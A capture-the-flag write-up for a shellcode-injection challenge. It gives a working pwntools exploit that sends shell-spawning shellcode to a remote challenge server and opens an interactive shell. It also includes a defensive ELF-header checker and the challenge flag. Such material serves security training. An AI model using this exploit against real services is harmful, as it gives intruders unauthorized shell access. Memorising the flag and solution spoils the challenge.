turtle shell
simple shellcode
Problem
Solution
It's a simple and straightforward shellcode injection; this can be inferred from the name and the fact that none of the protections are enabled.

The program simply takes our input and runs it as code, so we can use pwntools' shellcraft to spawn a shell.

```python
#!/usr/bin/python3
from pwn import *

# =========================================================
#                          SETUP
# =========================================================
exe = './turtle-shell'
# Load the binary so pwntools picks up its architecture; checksec=True prints its protections
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'

local = False
if local:
    io = process(exe)
else:
    io = remote('turtle.sdc.tf', 1337)

# =========================================================
#                         ADDRESSES
# =========================================================

# =========================================================
#                         EXPLOITS
# =========================================================
# Assemble pwntools' stock shell-spawning shellcode for the target architecture
shellcode = asm(shellcraft.sh())

# flattening payload here
payload = flat([
    shellcode,
])

io.sendline(payload)
io.interactive()
```
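A defender-side check for the precondition noted above (none of the protections enabled), as an added example that is not part of the original writeup: it reads the ELF64 program headers to report whether the stack is marked executable and whether the binary is position-independent, two of the properties checksec reports. The names `audit_elf` and `make_sample` and the header-only sample images are constructed for illustration.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header that carries the stack permissions
PF_X = 0x1                  # segment flag: executable
ET_DYN = 3                  # e_type used by PIE executables (and shared objects)
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # ELF64 little-endian file header
PHDR = struct.Struct("<IIQQQQQQ")           # ELF64 little-endian program header


def audit_elf(data: bytes) -> dict:
    """Report PIE and stack-execute status of an ELF64 little-endian image."""
    if len(data) < EHDR.size:
        raise ValueError("truncated ELF header")
    (ident, e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = EHDR.unpack_from(data)
    if ident[:4] != b"\x7fELF" or ident[4] != 2 or ident[5] != 1:
        raise ValueError("not an ELF64 little-endian file")
    if e_phnum and e_phentsize < PHDR.size:
        raise ValueError("program header entries are too small")
    # Without PT_GNU_STACK the effective stack permissions depend on the platform.
    stack = "no PT_GNU_STACK"
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + PHDR.size > len(data):
            raise ValueError("program header table runs past end of file")
        p_type, p_flags = struct.unpack_from("<II", data, off)
        if p_type == PT_GNU_STACK:
            stack = "executable" if p_flags & PF_X else "non-executable"
    return {"pie": e_type == ET_DYN, "stack": stack}


def make_sample(e_type: int, stack_flags: int) -> bytes:
    """Constructed header-only ELF64 image with a single PT_GNU_STACK entry."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
    ehdr = EHDR.pack(ident, e_type, 62, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 1, 0, 0, 0)
    return ehdr + PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)


if __name__ == "__main__":
    print(audit_elf(make_sample(2, 0x7)))   # constructed: ET_EXEC, RWX stack
    print(audit_elf(make_sample(3, 0x6)))   # constructed: ET_DYN, RW stack
```

A build that reports an executable stack or a non-PIE image here is worth flagging in CI before it ships.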
Flag
sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}